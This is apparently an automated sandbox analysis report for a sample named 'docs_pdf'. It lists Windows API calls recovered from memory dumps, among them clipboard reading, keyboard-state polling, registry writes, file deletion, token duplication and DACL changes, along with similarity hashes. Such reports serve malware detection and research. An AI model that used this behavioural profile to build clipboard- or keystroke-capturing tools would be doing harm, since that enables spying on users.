                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                    • String ID: $default$winsta0
                                    • API String ID: 2063423040-1027155976
                                    • Opcode ID: 1c2ec57f2b31b6bfd4729aea961066fd29581cda1f01dc27474e0a45aac1d1e5
                                    • Instruction ID: e0a8ec386017e970732fb93984a83c05f3987f57c4128fe4e6afb83c8981b87b
                                    • Opcode Fuzzy Hash: 1c2ec57f2b31b6bfd4729aea961066fd29581cda1f01dc27474e0a45aac1d1e5
                                    • Instruction Fuzzy Hash: A8813171D00209AFFF12DFA4DC44AEE7BB9FF15304F08816AF994A6290DB358A54DB61
                                    APIs
                                    • OpenClipboard.USER32(0103F910), ref: 01024284
                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 01024292
                                    • GetClipboardData.USER32(0000000D), ref: 0102429A
                                    • CloseClipboard.USER32 ref: 010242A6
                                    • GlobalLock.KERNEL32(00000000), ref: 010242C2
                                    • CloseClipboard.USER32 ref: 010242CC
                                    • GlobalUnlock.KERNEL32(00000000,00000000), ref: 010242E1
                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 010242EE
                                    • GetClipboardData.USER32(00000001), ref: 010242F6
                                    • GlobalLock.KERNEL32(00000000), ref: 01024303
                                    • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 01024337
                                    • CloseClipboard.USER32 ref: 01024447
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                    • String ID:
                                    • API String ID: 3222323430-0
                                    • Opcode ID: 2a25b29045af990549fa50c13434ec9c30cc4c40d23a3663d7eea51d7f51336d
                                    • Instruction ID: 7e607d9e0f639b675d9d3132caad69722dc267da6040cb9189b9f665bc95d864
                                    • Opcode Fuzzy Hash: 2a25b29045af990549fa50c13434ec9c30cc4c40d23a3663d7eea51d7f51336d
                                    • Instruction Fuzzy Hash: 0D518E35604312ABE321BF65EC85FAE77ACAF84B00F004529F5D6D21A1DF79D9049B63
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?), ref: 0101C9F8
                                    • FindClose.KERNEL32(00000000), ref: 0101CA4C
                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0101CA71
                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0101CA88
                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0101CAAF
                                    • __swprintf.LIBCMT ref: 0101CAFB
                                    • __swprintf.LIBCMT ref: 0101CB3E
                                      • Part of subcall function 00FB7F41: _memmove.LIBCMT ref: 00FB7F82
                                    • __swprintf.LIBCMT ref: 0101CB92
                                      • Part of subcall function 00FD38D8: __woutput_l.LIBCMT ref: 00FD3931
                                    • __swprintf.LIBCMT ref: 0101CBE0
                                      • Part of subcall function 00FD38D8: __flsbuf.LIBCMT ref: 00FD3953
                                      • Part of subcall function 00FD38D8: __flsbuf.LIBCMT ref: 00FD396B
                                    • __swprintf.LIBCMT ref: 0101CC2F
                                    • __swprintf.LIBCMT ref: 0101CC7E
                                    • __swprintf.LIBCMT ref: 0101CCCD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                    • API String ID: 3953360268-2428617273
                                    • Opcode ID: e4b394ffdbd6c2dd3d0b2d8c15b16b845edbec73d21113d82f28936c3aa05b71
                                    • Instruction ID: 3d61bdafab01b98b70c94ec095b4c6f8948ddd669c3605c4a88926bc5e353448
                                    • Opcode Fuzzy Hash: e4b394ffdbd6c2dd3d0b2d8c15b16b845edbec73d21113d82f28936c3aa05b71
                                    • Instruction Fuzzy Hash: 5AA15CB2408305ABD710FF65CD86DAFB7ECEF84700F444919B686D3191EA78DA08DB62
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0101F221
                                    • _wcscmp.LIBCMT ref: 0101F236
                                    • _wcscmp.LIBCMT ref: 0101F24D
                                    • GetFileAttributesW.KERNEL32(?), ref: 0101F25F
                                    • SetFileAttributesW.KERNEL32(?,?), ref: 0101F279
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0101F291
                                    • FindClose.KERNEL32(00000000), ref: 0101F29C
                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 0101F2B8
                                    • _wcscmp.LIBCMT ref: 0101F2DF
                                    • _wcscmp.LIBCMT ref: 0101F2F6
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0101F308
                                    • SetCurrentDirectoryW.KERNEL32(0106A5A0), ref: 0101F326
                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0101F330
                                    • FindClose.KERNEL32(00000000), ref: 0101F33D
                                    • FindClose.KERNEL32(00000000), ref: 0101F34F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                    • String ID: *.*
                                    • API String ID: 1803514871-438819550
                                    • Opcode ID: 7af7c2a3d9df7bf6711793888d7b97a1c4c94e9f5362a4ac10ef96fa4fdf4b84
                                    • Instruction ID: 8b318e354eb115f2d963457c517cf413fece0bc4125c5ad228d932635856cba0
                                    • Opcode Fuzzy Hash: 7af7c2a3d9df7bf6711793888d7b97a1c4c94e9f5362a4ac10ef96fa4fdf4b84
                                    • Instruction Fuzzy Hash: 9731FB76A0021BABDB20DBB4DC48ADE77ECAF48260F144196F994E3054DB39DA49CB51
                                    APIs
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 01030BDE
                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,0103F910,00000000,?,00000000,?,?), ref: 01030C4C
                                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 01030C94
                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 01030D1D
                                    • RegCloseKey.ADVAPI32(?), ref: 0103103D
                                    • RegCloseKey.ADVAPI32(00000000), ref: 0103104A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Close$ConnectCreateRegistryValue
                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                    • API String ID: 536824911-966354055
                                    • Opcode ID: 777f50a0d080eec6c5624c425a8d52a6e881337cc6fe704b52fe9ce48aff90ec
                                    • Instruction ID: 2a4e72f8d390622022ca14bc79523c271569554eac3260d914a0a78a4aba878a
                                    • Opcode Fuzzy Hash: 777f50a0d080eec6c5624c425a8d52a6e881337cc6fe704b52fe9ce48aff90ec
                                    • Instruction Fuzzy Hash: 10026D756046019FCB14EF29C881E6AB7E9FF89710F04885DF98A9B361CB79ED01DB81
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0101F37E
                                    • _wcscmp.LIBCMT ref: 0101F393
                                    • _wcscmp.LIBCMT ref: 0101F3AA
                                      • Part of subcall function 010145C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 010145DC
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0101F3D9
                                    • FindClose.KERNEL32(00000000), ref: 0101F3E4
                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 0101F400
                                    • _wcscmp.LIBCMT ref: 0101F427
                                    • _wcscmp.LIBCMT ref: 0101F43E
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0101F450
                                    • SetCurrentDirectoryW.KERNEL32(0106A5A0), ref: 0101F46E
                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0101F478
                                    • FindClose.KERNEL32(00000000), ref: 0101F485
                                    • FindClose.KERNEL32(00000000), ref: 0101F497
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                    • String ID: *.*
                                    • API String ID: 1824444939-438819550
                                    • Opcode ID: ae43b6ecffb90df2d387d0302177f2923b71ae0806ac1af0a7009d88dbc68ab3
                                    • Instruction ID: e32b3399b435f1ee85f6edb6b4e1950acdb93c6c875e52d93cd746403665cf34
                                    • Opcode Fuzzy Hash: ae43b6ecffb90df2d387d0302177f2923b71ae0806ac1af0a7009d88dbc68ab3
                                    • Instruction Fuzzy Hash: DF312E7154021B6FDF20EFA8DC84ADE77EC9F45260F144296E9C0E3154DB39DA48CB51
                                    APIs
                                      • Part of subcall function 0100874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 01008766
                                      • Part of subcall function 0100874A: GetLastError.KERNEL32(?,0100822A,?,?,?), ref: 01008770
                                      • Part of subcall function 0100874A: GetProcessHeap.KERNEL32(00000008,?,?,0100822A,?,?,?), ref: 0100877F
                                      • Part of subcall function 0100874A: HeapAlloc.KERNEL32(00000000,?,0100822A,?,?,?), ref: 01008786
                                      • Part of subcall function 0100874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0100879D
                                      • Part of subcall function 010087E7: GetProcessHeap.KERNEL32(00000008,01008240,00000000,00000000,?,01008240,?), ref: 010087F3
                                      • Part of subcall function 010087E7: HeapAlloc.KERNEL32(00000000,?,01008240,?), ref: 010087FA
                                      • Part of subcall function 010087E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,01008240,?), ref: 0100880B
                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0100825B
                                    • _memset.LIBCMT ref: 01008270
                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0100828F
                                    • GetLengthSid.ADVAPI32(?), ref: 010082A0
                                    • GetAce.ADVAPI32(?,00000000,?), ref: 010082DD
                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 010082F9
                                    • GetLengthSid.ADVAPI32(?), ref: 01008316
                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 01008325
                                    • HeapAlloc.KERNEL32(00000000), ref: 0100832C
                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0100834D
                                    • CopySid.ADVAPI32(00000000), ref: 01008354
                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 01008385
                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 010083AB
                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 010083BF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                    • String ID:
                                    • API String ID: 3996160137-0
                                    • Opcode ID: 5232616e64f568886749579661617613a7fc892916b651587a9a20bf24850935
                                    • Instruction ID: 36ccd1fa333ab6bf1ac6d1c3b699eaee533e388d108b1ef7c1180350e6269fcd
                                    • Opcode Fuzzy Hash: 5232616e64f568886749579661617613a7fc892916b651587a9a20bf24850935
                                    • Instruction Fuzzy Hash: AF616C71D0020AABEF119FA8DD45AEEBBB9FF44210F04C15AF995A6290DB359A05CB60
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                    • API String ID: 0-4052911093
                                    • Opcode ID: a04cb39eef9cf65e8004df278203df142f799a1813bec3899cc698650906f3f9
                                    • Instruction ID: 357652cd41f4c900beef620d664f8b8f8a09198dad3079668038fc0daf46bcb4
                                    • Opcode Fuzzy Hash: a04cb39eef9cf65e8004df278203df142f799a1813bec3899cc698650906f3f9
                                    • Instruction Fuzzy Hash: 31728471E0421ADBDF25CF58C981BAEB7F5FF48310F1481AAE949EB281D7349981DB90
                                    APIs
                                      • Part of subcall function 010310A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,01030038,?,?), ref: 010310BC
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 01030737
                                      • Part of subcall function 00FB9997: __itow.LIBCMT ref: 00FB99C2
                                      • Part of subcall function 00FB9997: __swprintf.LIBCMT ref: 00FB9A0C
                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 010307D6
                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0103086E
                                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 01030AAD
                                    • RegCloseKey.ADVAPI32(00000000), ref: 01030ABA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                    • String ID:
                                    • API String ID: 1240663315-0
                                    • Opcode ID: 7106a940a8b065b5c10a723212675da6b943c14eab9ac5bc0fb25b007c0443d8
                                    • Instruction ID: 5ec263df7b6988a040afc678b6eedd66bc3e8785823238d058bb5b15084d9fdf
                                    • Opcode Fuzzy Hash: 7106a940a8b065b5c10a723212675da6b943c14eab9ac5bc0fb25b007c0443d8
                                    • Instruction Fuzzy Hash: B2E18F31604201AFCB14DF29C884E6ABBE9FF89714F04896DF58ADB265DB35E901CF52
                                    APIs
                                    • GetKeyboardState.USER32(?), ref: 01010241
                                    • GetAsyncKeyState.USER32(000000A0), ref: 010102C2
                                    • GetKeyState.USER32(000000A0), ref: 010102DD
                                    • GetAsyncKeyState.USER32(000000A1), ref: 010102F7
                                    • GetKeyState.USER32(000000A1), ref: 0101030C
                                    • GetAsyncKeyState.USER32(00000011), ref: 01010324
                                    • GetKeyState.USER32(00000011), ref: 01010336
                                    • GetAsyncKeyState.USER32(00000012), ref: 0101034E
                                    • GetKeyState.USER32(00000012), ref: 01010360
                                    • GetAsyncKeyState.USER32(0000005B), ref: 01010378
                                    • GetKeyState.USER32(0000005B), ref: 0101038A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: State$Async$Keyboard
                                    • String ID:
                                    • API String ID: 541375521-0
                                    • Opcode ID: a8d470fe0847489f61052fee5f59230b6e2ed9bcc20545e0208ae72d0f025afa
                                    • Instruction ID: f2314954d64438219efbb79d60e10473db2f90c89c5b2bb429e172eccc860195
                                    • Opcode Fuzzy Hash: a8d470fe0847489f61052fee5f59230b6e2ed9bcc20545e0208ae72d0f025afa
                                    • Instruction Fuzzy Hash: CF418A34A047CAAEFFB25A6884043E6BEE46B06344F0880DDE6C5471CFD79D55C48792
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                    • String ID:
                                    • API String ID: 1737998785-0
                                    • Opcode ID: c35b86915ca1edc4748ea85e5a3639c5e0345812e6db2791ad1059e672855535
                                    • Instruction ID: 37ee5fe75743286776fe59e9ae06050a14186843eca129fe8cfce3393b053d93
                                    • Opcode Fuzzy Hash: c35b86915ca1edc4748ea85e5a3639c5e0345812e6db2791ad1059e672855535
                                    • Instruction Fuzzy Hash: BC2191357006219FDB21AF65EC09B6D7BACEF08710F008056F9C6DB2A1CB7AA901DF55
                                    APIs
                                      • Part of subcall function 00FB48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FB48A1,?,?,00FB37C0,?), ref: 00FB48CE
                                      • Part of subcall function 01014CD3: GetFileAttributesW.KERNEL32(?,01013947), ref: 01014CD4
                                    • FindFirstFileW.KERNEL32(?,?), ref: 01013ADF
                                    • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 01013B87
                                    • MoveFileW.KERNEL32(?,?), ref: 01013B9A
                                    • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 01013BB7
                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 01013BD9
                                    • FindClose.KERNEL32(00000000,?,?,?,?), ref: 01013BF5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                    • String ID: \*.*
                                    • API String ID: 4002782344-1173974218
                                    • Opcode ID: 6af39e94956afca0e7e40a67339f8e31c57a6a3c08dee6cab3f35969ed87ae01
                                    • Instruction ID: 3ab96c4ebc9d933614b1d2cac8a94565ed01b12ae2d23af951b0c2dd4f0c5bd4
                                    • Opcode Fuzzy Hash: 6af39e94956afca0e7e40a67339f8e31c57a6a3c08dee6cab3f35969ed87ae01
                                    • Instruction Fuzzy Hash: 20518E3180020D9ACB15FBA1CE929EDB7B8BF14310F6441A9E4817B095EF296F09DBA0
                                    APIs
                                      • Part of subcall function 00FB7F41: _memmove.LIBCMT ref: 00FB7F82
                                    • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0101F6AB
                                    • Sleep.KERNEL32(0000000A), ref: 0101F6DB
                                    • _wcscmp.LIBCMT ref: 0101F6EF
                                    • _wcscmp.LIBCMT ref: 0101F70A
                                    • FindNextFileW.KERNEL32(?,?), ref: 0101F7A8
                                    • FindClose.KERNEL32(00000000), ref: 0101F7BE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                    • String ID: *.*
                                    • API String ID: 713712311-438819550
                                    • Opcode ID: 8f4a2e5c611949a9265415d88ab97234bc3a59735054e925021b15c9726f189d
                                    • Instruction ID: 7b9e970bcf42bb98b995a1a14822262e0c44aaeb02bb357ab92f1a3bd6345398
                                    • Opcode Fuzzy Hash: 8f4a2e5c611949a9265415d88ab97234bc3a59735054e925021b15c9726f189d
                                    • Instruction Fuzzy Hash: CC41807190020B9FDF51EF64CC85AEEBBB8FF05310F14459AE995A7190DB399A48CF90
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                    • API String ID: 0-1546025612
                                    • Opcode ID: e30c523ab10e17724735edb711a19f8bd03129771462263e1c55336af933ae66
                                    • Instruction ID: 84ef4b6842ebcbfb5d0becbf1574f85e11213117f02bb8d7d3d013e020b72123
                                    • Opcode Fuzzy Hash: e30c523ab10e17724735edb711a19f8bd03129771462263e1c55336af933ae66
                                    • Instruction Fuzzy Hash: 65A2B171E0421ACBDF24DF58CAA1BBDB7B1BF50324F1481AAD955A7294D730AE81EF40
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: _memmove
                                    • String ID:
                                    • API String ID: 4104443479-0
